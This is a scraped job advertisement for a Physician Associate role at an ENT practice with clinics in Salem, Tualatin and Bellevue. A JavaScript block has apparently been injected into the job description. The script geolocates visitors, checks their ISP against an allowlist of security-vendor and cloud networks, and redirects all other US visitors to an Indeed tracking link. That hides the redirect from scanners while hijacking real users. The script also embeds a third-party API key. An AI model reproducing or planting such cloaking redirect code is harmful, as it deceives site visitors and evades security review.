Physician Associate

Eugene, OR
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/289c05dd912e6bb0/cda49e1debc7cdc5bdb6410cfdb6171666e2e97ca6fa810d51d5f1fc1b18ba0e/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

We seek a *licensed, experienced Physician Associate* for a collaborative ENT practice specializing in *sinus, allergy, and sleep care* with locations in Salem, OR, Tualatin, OR, and Bellevue, WA.

  • Role involves work at both Salem and Tualatin clinics, with travel required.
  • Enjoy a *patient-centered, well-supported, and flexible* environment with 30–40-minute appointments and opportunities for procedural work.
  • Work-life balance with minimal after-hours duties and no hospital rounds or on-call shifts.
  • Benefit from growth opportunities, mentorship, and a team focused on innovation and continuous improvement.
  • Ideal candidates are licensed in Oregon (Washington license to be obtained), confident in clinical skills, adaptable, team-oriented, and excited about technology and change.
  • Compensation ranges from $120,000 to $150,000 annually, with comprehensive benefits including health, dental, vision, retirement, and professional development.

  • Join a forward-thinking, outcome-driven team dedicated to high-quality care and professional growth.